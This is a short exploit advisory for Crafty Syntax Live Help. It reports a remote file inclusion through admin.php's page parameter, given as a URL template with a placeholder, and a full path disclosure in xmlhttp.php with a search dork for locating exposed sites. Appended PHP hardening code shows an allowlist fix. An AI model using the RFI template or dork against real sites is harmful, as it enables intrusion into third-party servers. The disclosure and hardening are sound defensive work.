# Exploit Title : Crafty Syntax Live Help <= (2.*.* & 3.*.*) RFI + Path Disclosure
# Date : 4/19/2013
# Author : ITTIHACK
# Home : http://ittihack.com
# Vendor : http://www.craftysyntax.com
# Download : http://www.craftysyntax.com/craftysyntax3.4.1.zip
# Version : 2.* and 3.* , All versions
# Category : webapps
# Google dork : NA
# Tested on : Windows 7 + Apache server
# Description : Crafty Syntax Live Help is a live support application.
Highlighted features include the ability to create your own questions,
auto-inviting visitors, referrer tracking, page tracking, and more.
===========================================================================
1) Remote File Include : admin.php
if(!(isset($UNTRUSTED['page']))){ $UNTRUSTED['page'] = "scratch.php"; }
http://localhost/path/admin.php?page=[RFI]
===========================================================================
2) Full Path Disclosure: xmlhttp.php
Dork: inurl:"/xmlhttp.php" Notice: Undefined index: whattodo in
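Hardened counterpart to the two issues above, added here as a defensive illustration and not Crafty Syntax's own code: the admin.php include is resolved through a fixed allowlist instead of the raw `page` value, and the xmlhttp.php `whattodo` index is read with a default so no PHP notice can leak the install path. The page names, the use of $_GET as the request source and the function names are assumptions.

```php
<?php
// Added example (not from the advisory or the product): replaces
//   if(!(isset($UNTRUSTED['page']))){ $UNTRUSTED['page'] = "scratch.php"; }
//   include($UNTRUSTED['page']);
// with an allowlist so request data never reaches include().

// Assumption: illustrative admin page names; only 'scratch.php' is on the page.
const ALLOWED_PAGES = [
    'scratch'   => 'scratch.php',
    'settings'  => 'settings.php',
    'operators' => 'operators.php',
];

// Map the untrusted 'page' key to a known file under this directory.
// Any value not in the allowlist silently falls back to the default;
// the raw value is never used in a path and never echoed back.
function resolveAdminPage(array $request): string
{
    $key = $request['page'] ?? 'scratch';
    if (!is_string($key) || !array_key_exists($key, ALLOWED_PAGES)) {
        $key = 'scratch';
    }
    return __DIR__ . '/' . ALLOWED_PAGES[$key];
}

// xmlhttp.php fix: an optional request key is read with a default, so PHP
// no longer emits "Notice: Undefined index: whattodo in <full path>".
function readWhatToDo(array $request): string
{
    return isset($request['whattodo']) ? (string) $request['whattodo'] : '';
}

// Belt and braces: even if a notice slips through, do not print it to the
// client; log it instead. In php.ini, allow_url_include=Off (the default)
// additionally blocks remote URLs from ever being include()d.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Usage in admin.php (assumes $_GET carries the request parameters):
require resolveAdminPage($_GET);
```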